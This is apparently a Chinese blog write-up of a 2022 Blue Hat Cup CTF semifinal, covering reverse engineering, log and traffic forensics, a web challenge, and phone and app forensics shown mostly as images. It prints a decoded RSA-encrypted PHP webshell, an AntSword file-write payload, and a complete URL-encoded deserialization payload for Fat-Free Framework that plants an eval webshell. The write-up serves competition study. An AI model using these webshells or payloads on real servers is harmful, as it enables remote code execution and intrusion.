Golowper’s blog
Welcome to golowper’s blog !
Search
2022蓝帽杯半决赛 干煸豆角队wp
2022蓝帽杯半决赛 干煸豆角队wp
CTF_Wp|Aug 4, 2022|
Last edited 2022-8-4
type
Post
status
Published
date
Aug 4, 2022
slug
summary
干煸豆角队wp
tags
CTF_Wp
category
CTF_Wp
icon
password
URL
Photo
notion image
RebabynimMisc神秘的日志加密的通道Webeasyfatfree取证手机1手机2exe1exe2 exe3exe4exe5apk2apk5apk6 apk7apk8apk9apk10apk11 apk12apk13 服务器5

Re

babynim

逆向:先看string,然后看到有个输入
notion image
 
然后取找函数
notion image
 
有echo和readline就是打印输出
notion image
 
下面有两个initbigint
 
notion image
是把之前看到得长数初始化,就是高精度那一套。
 
notion image
然后有multy的函数,分析过后就是传一个数进去和一个固定小数相乘。然后就是最后进行比较
notion image
 
然后用c大数除就求出来

Misc

神秘的日志

阅读相关链接发现
1earn/NTLM中继.md at master · ffffffff0x/1earn
本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.
1earn/NTLM中继.md at master · ffffffff0x/1earn
https://github.com/ffffffff0x/1earn/blob/master/1earn/Security/RedTeam/OS%E5%AE%89%E5%85%A8/%E5%AE%9E%E9%AA%8C/NTLM%E4%B8%AD%E7%BB%A7.md
1earn/NTLM中继.md at master · ffffffff0x/1earn
notion image
LDAP之后是用户提权登录,所以直接全局搜索LDAP
notion image
阅读之前的搜索结果发现并未成功认证,找到最后一个发现LDAP中继成功了,确认当前时间到security日志中去找这个时间
发现其成功提权用户并登录
notion image
notion image
所以成功黑入的时间是2022-04-17T03:27:06.7108313Z
notion image

加密的通道

阅读流量包 发现攻击框架: 写入文件 用1.php写入文件rsa.php → rsa.php 加密流量 → 写入文件
获取 rsa.php :
notion image
301 流量包之后出现 rsa.php 查看上一个1.php中应该存在文件写入操作
notion image
关键参数:
notion image
看传参逻辑写出解密脚本,发现确实是rsa.php的写入命令:
notion image
放到编译器中美化一下,发现用phpjiami这个网站做了混淆
notion image
翻阅好多解混淆的文章终于在github找到了decode项目
notion image
运行之后获得rsa.php混淆前的内容
notion image
notion image
<?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDieYmLtWbGRSvUtevSlTOozmWR
qEGF4Hfvb1YCoVYAAlhnHnyMk+aLRvLXKgmerWiS+QD6y08Ispuzzn02tHE6d4Qp
DuPiPO9PAdGSXzFVFLK2hOrkXLsDXugNTdVUprdkPPI1YY0ZnMs1bT2Zf2dfuBI5
0S5e5sSOF85kNq/zwwIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
  if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
    $cmd .= $de;
  }
}
foreach($_POST as $k => $v){
  if (openssl_public_decrypt(base64_decode($v), $de, $pk)) {
     $_POST[$k]=$de;
}
}
eval($cmd);
追踪流,发现写入了文件flag.txt
notion image
url解码请求包
notion image
阅读ant参数的运行逻辑
发现它的 控制文件内容 的传入参数是k85c8f24ca50da
// cmd.php
<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr = preg_split("/;|:/", $opdir);
    @array_push($oparr, $ocwd, sys_get_temp_dir());
    foreach ($oparr as $item) {
        if (!@is_writable($item)) {
            continue;
        };
        $tmdir = $item . "/.730e32587";
        @mkdir($tmdir);
        if (!@file_exists($tmdir)) {
            continue;
        }
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr = @preg_split("/\\\\|\//", $tmdir);
        for ($i = 0; $i < sizeof($cntarr); $i++) {
            @chdir("..");
        };
        @ini_set("open_basedir", "/");
        @rmdir($tmdir);
        break;
    };
};;
function asenc($out)
{
    return $out;
}

;
function asoutput()
{
    $output = ob_get_contents();
    ob_end_clean();
    echo "f4" . "612";
    echo @asenc($output);
    echo "ca5" . "8ea8";
}

ob_start();
try {
    echo @fwrite(fopen(base64_decode(substr($_POST["o9b357e1d4d7b7"], 2)), "w"), base64_decode(substr($_POST["k85c8f24ca50da"], 2))) ? "1" : "0";;
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
asoutput();
die();
放入rsa.php解密参数k85c8f24ca50da 得到写入文件传参内容
notion image
根据运行命令得到文件内容需要base64_decode(substr($_POST["k85c8f24ca50da"], 2)) , 编写脚本得到flag
notion image
<?php

$ant = "1H9CciuT5TKMuAQA2rX7iDWNZWnXc4FQHsmkm/xPLCMRBRmSN9rqZGbfdzalHtuAKfrlNYP5MK7QK+/UqmI7Og24tgvdyI7yHWhE9KwV1MoygkeRDtX8r5Y/q/EeDwXbAqkkTNrPaY+XNBCQVLvwOATSClsMTM3e9I8wH3ov3pc=|u3Ch2JM8AJIZaVAQyZhK8xGaeba22k7FBCD1i3VV94k5H4RyWCx5/CiEBGVgc6pAYiYlGuZY9izj2g4Y++Yx8/VYBKFl3jeYJ3E7vjsRWpzz/u52LBQlQWGiM+s/Ev8E3HmF7Cyers6zk+UoWh4zFWNaBuk5+S8c1Of7n7d9Ze0=|w0c7Om/PX5eZI46YaikSQ3InT/LTyyljIIRfXaO5zziRaPo93VN4z3MUdZ+E3mUYy9KREzKn9Y834eSqSNCTRBiz68I5eUHJ+5if5rb6Du3NGOLEjc8/tW44/KNCPM+/dBE0WGsnO4EtyJAqjFd38zI2V9EoPbLqid5Bmq9Vm0M=|P+RjQXf7u/NdvHnwUUIyUy1rJQyOMebs2EBKn8j9nI1nkbGbqmndKjIP3DGOGTe4caFH0RsmsYCSChplhV1JXN5R+61bNlm2l6AEhlzlO9kNfh11pwgkeUPpgbo3STCGle78q0ztuYeFyo0s861b3SQlY6q0eyWaMlZPoTUup7o=|ZYs1IJ+XjVhwtDbfkq8Qc55W9Ven2Nz31BsLwT5kgvg1emfbJc7ZsmYMLTQ+e6d4I3gXTFGPdRSisc5iwTPBIl8BNVfTr9kDcYAqHoy9MOCFlUxkDO0buCReGnEg/qSSbcNTscQKNDwTQfHO8jD+c/AmLTCdk+RuKtZ3TN8W/b8=|cVHOaP17+kAkJsZsNve2XRWXthsGrn6AFrKX4uhMf7nSoq9Xy1z9upB6goESrsvwqPF8nP9PSBcRJK0DzxPAuE9NYYL4xKsb1ag7etc/RD3t8WxvqqliLMgV2HLCkdXAcdCYeGKfyTPBownyHH31rM3ous64Gcpf/RVBrqviDMU=|TgEkUsnxF4HCzOfAaNpAwZTs/Wv8EsF9lntW1B7UB3lKJm4zVucO213Vv45VEifYhSXX1YsBLN3g2DOYT16X00SRPmhuCHU2milsAcl+UJh1xz33UZgAv8gP633gYIuxSYyOYw5MZwn4ExEANlJRHrptONhBqYOSFWCujPzhhNU=|Pbmsbvf082mfyQ5PDDo83rBfwFEB4n6q2EKNeOpPR10C80Ko2hAVC75uHjbAbJfVijmPVduSSI6AbCkoccKsvezeCaa9X54O28UMNsGFrmlLKDLTBs7qBgK3EsBVetqGSEgonVTawTaw2YsuVLf3Bxk+7RJ/yewOam0FcdH1h5Q=|H28A54ZKdDMRtI0fHv14RN90yQLn/6m/m1Qn/YhVdHs5FeHDyOUbjbpInUU7bMOJKGTbI88Kw2p6QzGyqvever+kPMIqrkP7Fa2tIDQCq6DboFpF9wcUJ4zUQKKleXeUkvtfcPOdPePUSpNN2Y33HDiKtanY4cIhffvAkLy44oI=|Gb6e15DVS+JgwYx/mspwD/v7nbjHNmIqq5TZ+Eu+mR4UGTDVj7HLu4SekhCyL1ZLtjDe9GzrQIFl0OFu+Z2P3VrFNWO1Du2CJ9TpIrrInf9qN5sxpY7zJ8X1lkOmq++OZar8dMh0gDKQgSfy88zPlQRkhM48IASaowjfArVAvf4=|R6EJxGrbVadm0NF6K+iu0MkY3Hmn+0s+f4YyC/AXqslWN5UtwfeFMiMAa3apSUB3diMKasNRkVwDC/sjup1Pl1SsLixOXabKSUOA+vSbaUWoW9I+JRPP3M38pDH/jNN3tMi4vLU60mqK8N+BySXOpTXxSGzu0f3sTgNzT3/SGig=|OXWSDhuRuPXtKlsR2zidy+AI/TQS6qvex79FvF2dQ+Druvh/gglIgFo/yCn/tPWFqOsMUBj6rk3RqkTTd4dgE6Zrc7wAVP+TNSTaueFPJUuiUriNAIJ/UusGwNv+VTaWZt50rr2h0/+V/tpNa0Oi084ZQT503O1uorrc4R7nPXw=";

$k85c8f24ca50da="4MZmxhZ3s4NDRkZmM4NmRhMjNhNGQ1MjgzOTA3ZWZhZjk3OTFhZH0=";
var_dump(base64_decode(substr($k85c8f24ca50da, 2)));

$o9b357e1d4d7b7="Vw12/DDnvTFUuLl9FEAp0ei1E5Es0kwGDfGg1XbpQhAYy0mQeNMk0O9WhJAP/uKduN/VpDWCwfF7GiN/FyrCJBKWbUdpflTzaQn4EHsY8GT5uW9sz12nyWzilMAEECgs3rdk3ELeBpm/AmqYV8VnoUbZX3HL0Z7VBaQKHiRGIL8=";
notion image
 

Web

easyfatfree

www.zip拿到源码
和2020年ciscn的题目一致
第十三届全国大学生信息安全竞赛 2020CISCN 线上初赛Writeup_末 初的博客-CSDN博客
web目录无权限写到ui目录下
<?php
namespace DB;

//! In-memory/flat-file DB wrapper
class Jig {

 //@{ Storage formats
 const
  FORMAT_JSON=0,
  FORMAT_Serialized=1;
    //@}
    protected
  //! Storage location
        $dir = '/var/www/html/ui/',
  //! Current storage format
        $format = 'self::FORMAT_JSON',
  //! Memory-held data
        $data = array('wumonster.php'=>array('a'=>'<?php eval($_REQUEST[1]);phpinfo();?>')),
  //! lazy load/save files
        $lazy = TRUE;
        
 /**
 * Read data from memory/file
 * @return array
 * @param $file string
    **/
}
$jig = new jig();
echo urlencode(serialize($jig));
payload=O%3A6%3A%22DB%5CJig%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00dir%22%3Bs%3A17%3A%22%2Fvar%2Fwww%2Fhtml%2Fui%2F%22%3Bs%3A9%3A%22%00%2A%00format%22%3Bs%3A17%3A%22self%3A%3AFORMAT_JSON%22%3Bs%3A7%3A%22%00%2A%00data%22%3Ba%3A1%3A%7Bs%3A13%3A%22wumonster.php%22%3Ba%3A1%3A%7Bs%3A1%3A%22a%22%3Bs%3A37%3A%22%3C%3Fphp+eval%28%24_REQUEST%5B1%5D%29%3Bphpinfo%28%29%3B%3F%3E%22%3B%7D%7Ds%3A7%3A%22%00%2A%00lazy%22%3Bb%3A1%3B%7D
马写进去后发现还是没办法访问根目录
notion image
用蚁剑的插件绕过disable_function,cat /flag即可
notion image

取证

手机1

notion image

手机2

notion image

exe1

notion image

exe2

notion image

exe3

notion image

exe4

notion image

exe5

 
notion image
notion image
notion image

apk2

手机取证在手机上用的MT管理器
https://ansjk.ecxeio.xyz
notion image
base64解码得到服务器地址
 

apk5

同6

apk6

notion image

apk7

3个activity,所以应该有3个
notion image

apk8

notion image

apk9

notion image

apk10

权限
notion image

apk11

notion image

apk12

notion image

apk13

notion image

服务器5

/www/server目录下发现6个插件
notion image
 
Relate Posts :
  • CTF_Wp
    • Code-Runner(Linux平台-Vscode插件)配置汇编一键运行脚本2022蓝帽杯初赛 干煸豆角队wp
    Catalog
    0%